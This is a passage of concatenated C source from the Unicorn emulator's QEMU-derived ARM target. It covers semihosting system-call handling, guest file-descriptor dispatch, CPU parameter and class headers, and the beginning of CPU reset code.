ARM_CPU(cs); CPUARMState *env = &cpu->env; target_ulong reg0 = is_a64(env) ? env->xregs[0] : env->regs[0]; if (ret == (target_ulong)-1) { errno = err; set_swi_errno(env, -1); reg0 = ret; } else { /* Fixup syscalls that use nonstardard return conventions. */ switch (reg0) { case TARGET_SYS_WRITE: case TARGET_SYS_READ: reg0 = arm_semi_syscall_len - ret; break; case TARGET_SYS_SEEK: reg0 = 0; break; default: reg0 = ret; break; } } if (is_a64(env)) { env->xregs[0] = reg0; } else { env->regs[0] = reg0; } } static target_ulong arm_flen_buf(ARMCPU *cpu) { /* Return an address in target memory of 64 bytes where the remote * gdb should write its stat struct. (The format of this structure * is defined by GDB's remote protocol and is not target-specific.) * We put this on the guest's stack just below SP. 
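     * Note this transiently reuses guest stack space below SP; we assume
     * the guest is stopped at the semihosting trap and will not touch
     * those 64 bytes before the fstat reply has been consumed.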
*/ CPUARMState *env = &cpu->env; target_ulong sp; if (is_a64(env)) { sp = env->xregs[31]; } else { sp = env->regs[13]; } return sp - 64; } static void arm_semi_flen_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* The size is always stored in big-endian order, extract the value. We assume the size always fit in 32 bits. */ uint32_t size; cpu_memory_rw_debug(cs, arm_flen_buf(cpu) + 32, (uint8_t *)&size, 4, 0); size = be32_to_cpu(size); if (is_a64(env)) { env->xregs[0] = size; } else { env->regs[0] = size; } errno = err; set_swi_errno(env, -1); } static int arm_semi_open_guestfd; static void arm_semi_open_cb(CPUState *cs, target_ulong ret, target_ulong err) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; if (ret == (target_ulong)-1) { errno = err; set_swi_errno(env, -1); dealloc_guestfd(arm_semi_open_guestfd); } else { associate_guestfd(arm_semi_open_guestfd, ret); ret = arm_semi_open_guestfd; } if (is_a64(env)) { env->xregs[0] = ret; } else { env->regs[0] = ret; } } static target_ulong arm_gdb_syscall(ARMCPU *cpu, gdb_syscall_complete_cb cb, const char *fmt, ...) { va_list va; CPUARMState *env = &cpu->env; va_start(va, fmt); gdb_do_syscallv(cb, fmt, va); va_end(va); /* * FIXME: in softmmu mode, the gdbstub will schedule our callback * to occur, but will not actually call it to complete the syscall * until after this function has returned and we are back in the * CPU main loop. Therefore callers to this function must not * do anything with its return value, because it is not necessarily * the result of the syscall, but could just be the old value of X0. * The only thing safe to do with this is that the callers of * do_arm_semihosting() will write it straight back into X0. * (In linux-user mode, the callback will have happened before * gdb_do_syscallv() returns.) * * We should tidy this up so neither this function nor * do_arm_semihosting() return a value, so the mistake of * doing something with the return value is not possible to make. */ return is_a64(env) ? env->xregs[0] : env->regs[0]; } /* * Types for functions implementing various semihosting calls * for specific types of guest file descriptor. These must all * do the work and return the required return value for the guest, * setting the guest errno if appropriate. */ typedef uint32_t sys_closefn(ARMCPU *cpu, GuestFD *gf); typedef uint32_t sys_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len); typedef uint32_t sys_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len); typedef uint32_t sys_isattyfn(ARMCPU *cpu, GuestFD *gf); typedef uint32_t sys_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset); typedef uint32_t sys_flenfn(ARMCPU *cpu, GuestFD *gf); static uint32_t host_closefn(ARMCPU *cpu, GuestFD *gf) { CPUARMState *env = &cpu->env; /* * Only close the underlying host fd if it's one we opened on behalf * of the guest in SYS_OPEN. 
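     * The standard descriptors were inherited from QEMU itself (they are
     * handed out for the ":tt" console pseudo-file), so closing them here
     * would kill the emulator's own stdio.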
*/ if (gf->hostfd == STDIN_FILENO || gf->hostfd == STDOUT_FILENO || gf->hostfd == STDERR_FILENO) { return 0; } return set_swi_errno(env, close(gf->hostfd)); } static uint32_t host_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t ret; CPUARMState *env = &cpu->env; char *s = lock_user(VERIFY_READ, buf, len, 1); if (!s) { /* Return bytes not written on error */ return len; } ret = set_swi_errno(env, write(gf->hostfd, s, len)); unlock_user(s, buf, 0); if (ret == (uint32_t)-1) { ret = 0; } /* Return bytes not written */ return len - ret; } static uint32_t host_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t ret; CPUARMState *env = &cpu->env; char *s = lock_user(VERIFY_WRITE, buf, len, 0); if (!s) { /* return bytes not read */ return len; } do { ret = set_swi_errno(env, read(gf->hostfd, s, len)); } while (ret == -1 && errno == EINTR); unlock_user(s, buf, len); if (ret == (uint32_t)-1) { ret = 0; } /* Return bytes not read */ return len - ret; } static uint32_t host_isattyfn(ARMCPU *cpu, GuestFD *gf) { return isatty(gf->hostfd); } static uint32_t host_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { CPUARMState *env = &cpu->env; uint32_t ret = set_swi_errno(env, lseek(gf->hostfd, offset, SEEK_SET)); if (ret == (uint32_t)-1) { return -1; } return 0; } static uint32_t host_flenfn(ARMCPU *cpu, GuestFD *gf) { CPUARMState *env = &cpu->env; struct stat buf; uint32_t ret = set_swi_errno(env, fstat(gf->hostfd, &buf)); if (ret == (uint32_t)-1) { return -1; } return buf.st_size; } static uint32_t gdb_closefn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_cb, "close,%x", gf->hostfd); } static uint32_t gdb_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { arm_semi_syscall_len = len; return arm_gdb_syscall(cpu, arm_semi_cb, "write,%x,%x,%x", gf->hostfd, buf, len); } static uint32_t gdb_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { arm_semi_syscall_len = len; return arm_gdb_syscall(cpu, arm_semi_cb, "read,%x,%x,%x", gf->hostfd, buf, len); } static uint32_t gdb_isattyfn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_cb, "isatty,%x", gf->hostfd); } static uint32_t gdb_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { return arm_gdb_syscall(cpu, arm_semi_cb, "lseek,%x,%x,0", gf->hostfd, offset); } static uint32_t gdb_flenfn(ARMCPU *cpu, GuestFD *gf) { return arm_gdb_syscall(cpu, arm_semi_flen_cb, "fstat,%x,%x", gf->hostfd, arm_flen_buf(cpu)); } #define SHFB_MAGIC_0 0x53 #define SHFB_MAGIC_1 0x48 #define SHFB_MAGIC_2 0x46 #define SHFB_MAGIC_3 0x42 /* Feature bits reportable in feature byte 0 */ #define SH_EXT_EXIT_EXTENDED (1 << 0) #define SH_EXT_STDOUT_STDERR (1 << 1) static const uint8_t featurefile_data[] = { SHFB_MAGIC_0, SHFB_MAGIC_1, SHFB_MAGIC_2, SHFB_MAGIC_3, SH_EXT_EXIT_EXTENDED | SH_EXT_STDOUT_STDERR, /* Feature byte 0 */ }; static void init_featurefile_guestfd(int guestfd) { GuestFD *gf = do_get_guestfd(guestfd); assert(gf); gf->type = GuestFDFeatureFile; gf->featurefile_offset = 0; } static uint32_t featurefile_closefn(ARMCPU *cpu, GuestFD *gf) { /* Nothing to do */ return 0; } static uint32_t featurefile_writefn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { /* This fd can never be open for writing */ CPUARMState *env = &cpu->env; errno = EBADF; return set_swi_errno(env, -1); } static uint32_t featurefile_readfn(ARMCPU *cpu, GuestFD *gf, target_ulong buf, uint32_t len) { uint32_t i; CPUARMState *env = &cpu->env; char *s; s = 
lock_user(VERIFY_WRITE, buf, len, 0); if (!s) { return len; } for (i = 0; i < len; i++) { if (gf->featurefile_offset >= sizeof(featurefile_data)) { break; } s[i] = featurefile_data[gf->featurefile_offset]; gf->featurefile_offset++; } unlock_user(s, buf, len); /* Return number of bytes not read */ return len - i; } static uint32_t featurefile_isattyfn(ARMCPU *cpu, GuestFD *gf) { return 0; } static uint32_t featurefile_seekfn(ARMCPU *cpu, GuestFD *gf, target_ulong offset) { gf->featurefile_offset = offset; return 0; } static uint32_t featurefile_flenfn(ARMCPU *cpu, GuestFD *gf) { return sizeof(featurefile_data); } typedef struct GuestFDFunctions { sys_closefn *closefn; sys_writefn *writefn; sys_readfn *readfn; sys_isattyfn *isattyfn; sys_seekfn *seekfn; sys_flenfn *flenfn; } GuestFDFunctions; static const GuestFDFunctions guestfd_fns[] = { [GuestFDHost] = { .closefn = host_closefn, .writefn = host_writefn, .readfn = host_readfn, .isattyfn = host_isattyfn, .seekfn = host_seekfn, .flenfn = host_flenfn, }, [GuestFDGDB] = { .closefn = gdb_closefn, .writefn = gdb_writefn, .readfn = gdb_readfn, .isattyfn = gdb_isattyfn, .seekfn = gdb_seekfn, .flenfn = gdb_flenfn, }, [GuestFDFeatureFile] = { .closefn = featurefile_closefn, .writefn = featurefile_writefn, .readfn = featurefile_readfn, .isattyfn = featurefile_isattyfn, .seekfn = featurefile_seekfn, .flenfn = featurefile_flenfn, }, }; /* Read the input value from the argument block; fail the semihosting * call if the memory read fails. */ #define GET_ARG(n) do { \ if (is_a64(env)) { \ if (get_user_u64(arg ## n, args + (n) * 8)) { \ errno = EFAULT; \ return set_swi_errno(env, -1); \ } \ } else { \ if (get_user_u32(arg ## n, args + (n) * 4)) { \ errno = EFAULT; \ return set_swi_errno(env, -1); \ } \ } \ } while (0) #define SET_ARG(n, val) \ (is_a64(env) ? \ put_user_u64(val, args + (n) * 8) : \ put_user_u32(val, args + (n) * 4)) /* * Do a semihosting call. * * The specification always says that the "return register" either * returns a specific value or is corrupted, so we don't need to * report to our caller whether we are returning a value or trying to * leave the register unchanged. We use 0xdeadbeef as the return value * when there isn't a defined return value for the call. 
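 * (0xdeadbeef is an arbitrary poison value; the spec already allows the
 * register to be corrupted, so no guest may depend on what it reads back.)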
*/ target_ulong do_arm_semihosting(CPUARMState *env) { ARMCPU *cpu = env_archcpu(env); CPUState *cs = env_cpu(env); target_ulong args; target_ulong arg0, arg1, arg2, arg3; char * s; int nr; uint32_t ret; uint32_t len; GuestFD *gf; if (is_a64(env)) { /* Note that the syscall number is in W0, not X0 */ nr = env->xregs[0] & 0xffffffffU; args = env->xregs[1]; } else { nr = env->regs[0]; args = env->regs[1]; } switch (nr) { case TARGET_SYS_OPEN: { int guestfd; GET_ARG(0); GET_ARG(1); GET_ARG(2); s = lock_user_string(arg0); if (!s) { errno = EFAULT; return set_swi_errno(env, -1); } if (arg1 >= 12) { unlock_user(s, arg0, 0); errno = EINVAL; return set_swi_errno(env, -1); } guestfd = alloc_guestfd(); if (guestfd < 0) { unlock_user(s, arg0, 0); errno = EMFILE; return set_swi_errno(env, -1); } if (strcmp(s, ":tt") == 0) { int result_fileno; /* * We implement SH_EXT_STDOUT_STDERR, so: * open for read == stdin * open for write == stdout * open for append == stderr */ if (arg1 < 4) { result_fileno = STDIN_FILENO; } else if (arg1 < 8) { result_fileno = STDOUT_FILENO; } else { result_fileno = STDERR_FILENO; } associate_guestfd(guestfd, result_fileno); unlock_user(s, arg0, 0); return guestfd; } if (strcmp(s, ":semihosting-features") == 0) { unlock_user(s, arg0, 0); /* We must fail opens for modes other than 0 ('r') or 1 ('rb') */ if (arg1 != 0 && arg1 != 1) { dealloc_guestfd(guestfd); errno = EACCES; return set_swi_errno(env, -1); } init_featurefile_guestfd(guestfd); return guestfd; } if (use_gdb_syscalls()) { arm_semi_open_guestfd = guestfd; ret = arm_gdb_syscall(cpu, arm_semi_open_cb, "open,%s,%x,1a4", arg0, (int)arg2+1, gdb_open_modeflags[arg1]); } else { ret = set_swi_errno(env, open(s, open_modeflags[arg1], 0644)); if (ret == (uint32_t)-1) { dealloc_guestfd(guestfd); } else { associate_guestfd(guestfd, ret); ret = guestfd; } } unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_CLOSE: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } ret = guestfd_fns[gf->type].closefn(cpu, gf); dealloc_guestfd(arg0); return ret; case TARGET_SYS_WRITEC: qemu_semihosting_console_outc(env, args); return 0xdeadbeef; case TARGET_SYS_WRITE0: return qemu_semihosting_console_outs(env, args); case TARGET_SYS_WRITE: GET_ARG(0); GET_ARG(1); GET_ARG(2); len = arg2; gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].writefn(cpu, gf, arg1, len); case TARGET_SYS_READ: GET_ARG(0); GET_ARG(1); GET_ARG(2); len = arg2; gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].readfn(cpu, gf, arg1, len); case TARGET_SYS_READC: return qemu_semihosting_console_inc(env); case TARGET_SYS_ISTTY: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].isattyfn(cpu, gf); case TARGET_SYS_SEEK: GET_ARG(0); GET_ARG(1); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].seekfn(cpu, gf, arg1); case TARGET_SYS_FLEN: GET_ARG(0); gf = get_guestfd(arg0); if (!gf) { errno = EBADF; return set_swi_errno(env, -1); } return guestfd_fns[gf->type].flenfn(cpu, gf); case TARGET_SYS_TMPNAM: qemu_log_mask(LOG_UNIMP, "%s: SYS_TMPNAM not implemented", __func__); return -1; case TARGET_SYS_REMOVE: GET_ARG(0); GET_ARG(1); if (use_gdb_syscalls()) { ret = arm_gdb_syscall(cpu, arm_semi_cb, "unlink,%s", arg0, (int)arg1+1); } else { s = lock_user_string(arg0); if (!s) { errno = 
EFAULT; return set_swi_errno(env, -1); } ret = set_swi_errno(env, remove(s)); unlock_user(s, arg0, 0); } return ret; case TARGET_SYS_RENAME: GET_ARG(0); GET_ARG(1); GET_ARG(2); GET_ARG(3); if (use_gdb_syscalls()) { return arm_gdb_syscall(cpu, arm_semi_cb, "rename,%s,%s", arg0, (int)arg1+1, arg2, (int)arg3+1); } else { char *s2; s = lock_user_string(arg0); s2 = lock_user_string(arg2); if (!s || !s2) { errno = EFAULT; ret = set_swi_errno(env, -1); } else { ret = set_swi_errno(env, rename(s, s2)); } if (s2) unlock_user(s2, arg2, 0); if (s) unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_CLOCK: return clock() / (CLOCKS_PER_SEC / 100); case TARGET_SYS_TIME: return set_swi_errno(env, time(NULL)); case TARGET_SYS_SYSTEM: GET_ARG(0); GET_ARG(1); if (use_gdb_syscalls()) { return arm_gdb_syscall(cpu, arm_semi_cb, "system,%s", arg0, (int)arg1+1); } else { s = lock_user_string(arg0); if (!s) { errno = EFAULT; return set_swi_errno(env, -1); } ret = set_swi_errno(env, system(s)); unlock_user(s, arg0, 0); return ret; } case TARGET_SYS_ERRNO: return get_swi_errno(env); case TARGET_SYS_GET_CMDLINE: { /* Build a command-line from the original argv. * * The inputs are: * * arg0, pointer to a buffer of at least the size * specified in arg1. * * arg1, size of the buffer pointed to by arg0 in * bytes. * * The outputs are: * * arg0, pointer to null-terminated string of the * command line. * * arg1, length of the string pointed to by arg0. */ char *output_buffer; size_t input_size; size_t output_size; int status = 0; const char *cmdline; GET_ARG(0); GET_ARG(1); input_size = arg1; /* Compute the size of the output string. */ cmdline = semihosting_get_cmdline(); if (cmdline == NULL) { cmdline = ""; /* Default to an empty line. */ } output_size = strlen(cmdline) + 1; /* Count terminating 0. */ if (output_size > input_size) { /* Not enough space to store command-line arguments. */ errno = E2BIG; return set_swi_errno(env, -1); } /* Adjust the command-line length. */ if (SET_ARG(1, output_size - 1)) { /* Couldn't write back to argument block */ errno = EFAULT; return set_swi_errno(env, -1); } /* Lock the buffer on the ARM side. */ output_buffer = lock_user(VERIFY_WRITE, arg0, output_size, 0); if (!output_buffer) { errno = EFAULT; return set_swi_errno(env, -1); } /* Copy the command-line arguments. */ pstrcpy(output_buffer, output_size, cmdline); /* Unlock the buffer on the ARM side. */ unlock_user(output_buffer, arg0, output_size); return status; } case TARGET_SYS_HEAPINFO: { target_ulong retvals[4]; target_ulong limit; int i; GET_ARG(0); limit = ram_size; /* TODO: Make this use the limit of the loaded application. */ retvals[0] = limit / 2; retvals[1] = limit; retvals[2] = limit; /* Stack base */ retvals[3] = 0; /* Stack limit. */ for (i = 0; i < ARRAY_SIZE(retvals); i++) { bool fail; if (is_a64(env)) { fail = put_user_u64(retvals[i], arg0 + i * 8); } else { fail = put_user_u32(retvals[i], arg0 + i * 4); } if (fail) { /* Couldn't write back to argument block */ errno = EFAULT; return set_swi_errno(env, -1); } } return 0; } case TARGET_SYS_EXIT: case TARGET_SYS_EXIT_EXTENDED: if (nr == TARGET_SYS_EXIT_EXTENDED || is_a64(env)) { /* * The A64 version of SYS_EXIT takes a parameter block, * so the application-exit type can return a subcode which * is the exit status code from the application. * SYS_EXIT_EXTENDED is an a new-in-v2.0 optional function * which allows A32/T32 guests to also provide a status code. 
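         * In both parameter-block forms, word 0 holds the stop reason and
         * word 1 the subcode that becomes the exit status, as read by the
         * two GET_ARG() calls below.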
 */
            GET_ARG(0);
            GET_ARG(1);
            if (arg0 == ADP_Stopped_ApplicationExit) {
                ret = arg1;
            } else {
                ret = 1;
            }
        } else {
            /*
             * The A32/T32 version of SYS_EXIT specifies only
             * Stopped_ApplicationExit as normal exit, but does not
             * allow the guest to specify the exit status code.
             * Everything else is considered an error.
             */
            ret = (args == ADP_Stopped_ApplicationExit) ? 0 : 1;
        }
        gdb_exit(env, ret);
        exit(ret);
    case TARGET_SYS_SYNCCACHE:
        /*
         * Clean the D-cache and invalidate the I-cache for the specified
         * virtual address range. This is a nop for us since we don't
         * implement caches. This is only present on A64.
         */
        if (is_a64(env)) {
            return 0;
        }
        /* fall through -- invalid for A32/T32 */
    default:
        fprintf(stderr, "qemu: Unsupported SemiHosting SWI 0x%02x\n", nr);
        cpu_dump_state(cs, stderr, 0);
        abort();
    }
}

unicorn-2.1.1/qemu/target/arm/arm_ldst.h

/*
 * ARM load/store instructions for code (armeb-user support)
 *
 * Copyright (c) 2012 CodeSourcery, LLC
 *
 * This library is free software; you can redistribute it and/or
 * modify it under the terms of the GNU Lesser General Public
 * License as published by the Free Software Foundation; either
 * version 2 of the License, or (at your option) any later version.
 *
 * This library is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
 * Lesser General Public License for more details.
 *
 * You should have received a copy of the GNU Lesser General Public
 * License along with this library; if not, see <http://www.gnu.org/licenses/>.
 */

#ifndef ARM_LDST_H
#define ARM_LDST_H

#include "exec/translator.h"
#include "qemu/bswap.h"

#include <uc_priv.h>

/* Load an instruction and return it in the standard little-endian order */
static inline uint32_t arm_ldl_code(CPUARMState *env, target_ulong addr,
                                    bool sctlr_b)
{
    TCGContext *tcg_ctx = env->uc->tcg_ctx;
    return translator_ldl_swap(tcg_ctx, env, addr, bswap_code(sctlr_b));
}

/* Ditto, for a halfword (Thumb) instruction */
static inline uint16_t arm_lduw_code(CPUARMState *env, target_ulong addr,
                                     bool sctlr_b)
{
    TCGContext *tcg_ctx = env->uc->tcg_ctx;
    /* In big-endian (BE32) mode, adjacent Thumb instructions have been
       swapped within each word. Undo that now. */
    // Unicorn: Note that we don't have any loader so this patch makes no sense.
    // And sctlr_b is 0 in aarch64.
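    // Upstream QEMU XORs the halfword address with 2 here when SCTLR.B is
    // set, so that BE32 images (which are word-swapped) still yield Thumb
    // halfwords in program order; with no loader and BE32 unused, Unicorn
    // leaves the address untouched.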
    // if (sctlr_b) {
    //     addr ^= 2;
    // }
    return translator_lduw_swap(tcg_ctx, env, addr, bswap_code(sctlr_b));
}

#endif

unicorn-2.1.1/qemu/target/arm/cpu-param.h

/*
 * ARM cpu parameters for qemu.
 *
 * Copyright (c) 2003 Fabrice Bellard
 * SPDX-License-Identifier: LGPL-2.0+
 */

#ifndef ARM_CPU_PARAM_H
#define ARM_CPU_PARAM_H 1

#ifdef TARGET_AARCH64
# define TARGET_LONG_BITS 64
# define TARGET_PHYS_ADDR_SPACE_BITS 48
# define TARGET_VIRT_ADDR_SPACE_BITS 48
#else
# define TARGET_LONG_BITS 32
# define TARGET_PHYS_ADDR_SPACE_BITS 40
# define TARGET_VIRT_ADDR_SPACE_BITS 32
#endif

/*
 * ARMv7 and later CPUs have 4K pages minimum, but ARMv5 and v6
 * have to support 1K tiny pages.
 */
# define TARGET_PAGE_BITS_VARY
# define TARGET_PAGE_BITS_MIN 10

#define NB_MMU_MODES 12

#endif

unicorn-2.1.1/qemu/target/arm/cpu-qom.h

/*
 * QEMU ARM CPU
 *
 * Copyright (c) 2012 SUSE LINUX Products GmbH
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
 *
 * You should have received a copy of the GNU General Public License
 * along with this program; if not, see
 * <http://www.gnu.org/licenses/gpl-2.0.html>
 */

#ifndef QEMU_ARM_CPU_QOM_H
#define QEMU_ARM_CPU_QOM_H

#include "hw/core/cpu.h"

struct arm_boot_info;

#define TYPE_ARM_CPU "arm-cpu"

#define ARM_CPU(obj) ((ARMCPU *)obj)
#define ARM_CPU_CLASS(klass) ((ARMCPUClass *)klass)
#define ARM_CPU_GET_CLASS(obj) (&((ARMCPU *)obj)->cc)

#define TYPE_ARM_MAX_CPU "max-" TYPE_ARM_CPU

typedef struct ARMCPUInfo ARMCPUInfo;

/**
 * ARMCPUClass:
 * @parent_reset: The parent class' reset handler.
 *
 * An ARM CPU model.
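 * Each concrete model also records the ARMCPUInfo table entry (@info)
 * it was instantiated from.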
 */
typedef struct ARMCPUClass {
    /*< private >*/
    CPUClass parent_class;
    /*< public >*/
    const ARMCPUInfo *info;
    void (*parent_reset)(CPUState *cpu);
} ARMCPUClass;

typedef struct ARMCPU ARMCPU;

#define TYPE_AARCH64_CPU "aarch64-cpu"
#define AARCH64_CPU_CLASS(klass) \
    OBJECT_CLASS_CHECK(AArch64CPUClass, (klass), TYPE_AARCH64_CPU)
#define AARCH64_CPU_GET_CLASS(obj) \
    OBJECT_GET_CLASS(AArch64CPUClass, (obj), TYPE_AARCH64_CPU)

typedef struct AArch64CPUClass {
    /*< private >*/
    ARMCPUClass parent_class;
    /*< public >*/
} AArch64CPUClass;

void register_cp_regs_for_features(ARMCPU *cpu);

/* Callback functions for the generic timer's timers. */
void arm_gt_ptimer_cb(void *opaque);
void arm_gt_vtimer_cb(void *opaque);
void arm_gt_htimer_cb(void *opaque);
void arm_gt_stimer_cb(void *opaque);
void arm_gt_hvtimer_cb(void *opaque);

#define ARM_AFF0_SHIFT 0
#define ARM_AFF0_MASK (0xFFULL << ARM_AFF0_SHIFT)
#define ARM_AFF1_SHIFT 8
#define ARM_AFF1_MASK (0xFFULL << ARM_AFF1_SHIFT)
#define ARM_AFF2_SHIFT 16
#define ARM_AFF2_MASK (0xFFULL << ARM_AFF2_SHIFT)
#define ARM_AFF3_SHIFT 32
#define ARM_AFF3_MASK (0xFFULL << ARM_AFF3_SHIFT)
#define ARM_DEFAULT_CPUS_PER_CLUSTER 8

#define ARM32_AFFINITY_MASK (ARM_AFF0_MASK|ARM_AFF1_MASK|ARM_AFF2_MASK)
#define ARM64_AFFINITY_MASK \
    (ARM_AFF0_MASK|ARM_AFF1_MASK|ARM_AFF2_MASK|ARM_AFF3_MASK)
#define ARM64_AFFINITY_INVALID (~ARM64_AFFINITY_MASK)

#endif

unicorn-2.1.1/qemu/target/arm/cpu.c

/*
 * QEMU ARM CPU
 *
 * Copyright (c) 2012 SUSE LINUX Products GmbH
 *
 * This program is free software; you can redistribute it and/or
 * modify it under the terms of the GNU General Public License
 * as published by the Free Software Foundation; either version 2
 * of the License, or (at your option) any later version.
 *
 * This program is distributed in the hope that it will be useful,
 * but WITHOUT ANY WARRANTY; without even the implied warranty of
 * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
 * GNU General Public License for more details.
* * You should have received a copy of the GNU General Public License * along with this program; if not, see * <http://www.gnu.org/licenses/gpl-2.0.html> */ #include "cpu.h" #include "internals.h" #include "exec/exec-all.h" #include "sysemu/sysemu.h" #include "fpu/softfloat.h" #include <uc_priv.h> static void arm_cpu_set_pc(CPUState *cs, vaddr value) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; if (is_a64(env)) { env->pc = value; env->thumb = 0; } else { env->regs[15] = value & ~1; env->thumb = value & 1; } } static void arm_cpu_synchronize_from_tb(CPUState *cs, TranslationBlock *tb) { ARMCPU *cpu = ARM_CPU(cs); CPUARMState *env = &cpu->env; /* * It's OK to look at env for the current mode here, because it's * never possible for an AArch64 TB to chain to an AArch32 TB. */ if (is_a64(env)) { env->pc = tb->pc; } else { env->regs[15] = tb->pc; } } static bool arm_cpu_has_work(CPUState *cs) { ARMCPU *cpu = ARM_CPU(cs); return (cpu->power_state != PSCI_OFF) && cs->interrupt_request & (CPU_INTERRUPT_FIQ | CPU_INTERRUPT_HARD | CPU_INTERRUPT_VFIQ | CPU_INTERRUPT_VIRQ | CPU_INTERRUPT_EXITTB); } static void arm_register_pre_el_change_hook(ARMCPU *cpu, ARMELChangeHookFn *hook, void *opaque) { ARMELChangeHook *entry = g_new0(ARMELChangeHook, 1); entry->hook = hook; entry->opaque = opaque; QLIST_INSERT_HEAD(&cpu->pre_el_change_hooks, entry, node); } static void arm_register_el_change_hook(ARMCPU *cpu, ARMELChangeHookFn *hook, void *opaque) { ARMELChangeHook *entry = g_new0(ARMELChangeHook, 1); entry->hook = hook; entry->opaque = opaque; QLIST_INSERT_HEAD(&cpu->el_change_hooks, entry, node); } static void cp_reg_reset(gpointer key, gpointer value, gpointer opaque) { /* Reset a single ARMCPRegInfo register */ ARMCPRegInfo *ri = value; ARMCPU *cpu = opaque; if (ri->type & (ARM_CP_SPECIAL | ARM_CP_ALIAS)) { return; } if (ri->resetfn) { ri->resetfn(&cpu->env, ri); return; } /* A zero offset is never possible as it would be regs[0] * so we use it to indicate that reset is being handled elsewhere. * This is basically only used for fields in non-core coprocessors * (like the pxa2xx ones). */ if (!ri->fieldoffset) { return; } if (cpreg_field_is_64bit(ri)) { CPREG_FIELD64(&cpu->env, ri) = ri->resetvalue; } else { CPREG_FIELD32(&cpu->env, ri) = ri->resetvalue; } } static void cp_reg_check_reset(gpointer key, gpointer value, gpointer opaque) { /* Purely an assertion check: we've already done reset once, * so now check that running the reset for the cpreg doesn't * change its value. This traps bugs where two different cpregs * both try to reset the same state field but to different values. 
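 * The before/after comparison below is compiled in only when assertions
 * are enabled (i.e. NDEBUG is not defined); release builds just re-run
 * the reset without checking.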
*/ ARMCPRegInfo *ri = value; #ifndef NDEBUG ARMCPU *cpu = opaque; uint64_t oldvalue, newvalue; #endif if (ri->type & (ARM_CP_SPECIAL | ARM_CP_ALIAS | ARM_CP_NO_RAW)) { return; } #ifndef NDEBUG oldvalue = read_raw_cp_reg(&cpu->env, ri); #endif cp_reg_reset(key, value, opaque); #ifndef NDEBUG newvalue = read_raw_cp_reg(&cpu->env, ri); assert(oldvalue == newvalue); #endif } static void arm_cpu_reset(CPUState *dev) { CPUState *s = CPU(dev); ARMCPU *cpu = ARM_CPU(s); ARMCPUClass *acc = ARM_CPU_GET_CLASS(cpu); CPUARMState *env = &cpu->env; acc->parent_reset(dev); memset(env, 0, offsetof(CPUARMState, end_reset_fields)); g_hash_table_foreach(cpu->cp_regs, cp_reg_reset, cpu); g_hash_table_foreach(cpu->cp_regs, cp_reg_check_reset, cpu); env->vfp.xregs[ARM_VFP_FPSID] = cpu->reset_fpsid; env->vfp.xregs[ARM_VFP_MVFR0] = cpu->isar.mvfr0; env->vfp.xregs[ARM_VFP_MVFR1] = cpu->isar.mvfr1; env->vfp.xregs[ARM_VFP_MVFR2] = cpu->isar.mvfr2; cpu->power_state = cpu->start_powered_off ? PSCI_OFF : PSCI_ON; s->halted = cpu->start_powered_off; if (arm_feature(env, ARM_FEATURE_IWMMXT)) { env->iwmmxt.cregs[ARM_IWMMXT_wCID] = 0x69051000 | 'Q'; } if (arm_feature(env, ARM_FEATURE_AARCH64)) { /* 64 bit CPUs always start in 64 bit mode */ env->aarch64 = 1; /* Reset into the highest available EL */ if (arm_feature(env, ARM_FEATURE_EL3)) { env->pstate = PSTATE_MODE_EL3h; } else if (arm_feature(env, ARM_FEATURE_EL2)) { env->pstate = PSTATE_MODE_EL2h; } else { env->pstate = PSTATE_MODE_EL1h; } env->pc = cpu->rvbar; } /* * If the highest available EL is EL2, AArch32 will start in Hyp * mode; otherwise it starts in SVC. Note that if we start in * AArch64 then these values in the uncached_cpsr will be ignored. */ if (arm_feature(env, ARM_FEATURE_EL2) && !arm_feature(env, ARM_FEATURE_EL3)) { env->uncached_cpsr = ARM_CPU_MODE_HYP; } else { env->uncached_cpsr = ARM_CPU_MODE_SVC; } env->daif = PSTATE_D | PSTATE_A | PSTATE_I | PSTATE_F; if (arm_feature(env, ARM_FEATURE_M)) { uint32_t initial_msp; /* Loaded from 0x0 */ uint32_t initial_pc; /* Loaded from 0x4 */ // uint8_t *rom; uint32_t vecbase; if (arm_feature(env, ARM_FEATURE_M_SECURITY)) { env->v7m.secure = true; } else { /* This bit resets to 0 if security is supported, but 1 if * it is not. The bit is not present in v7M, but we set it * here so we can avoid having to make checks on it conditional * on ARM_FEATURE_V8 (we don't let the guest 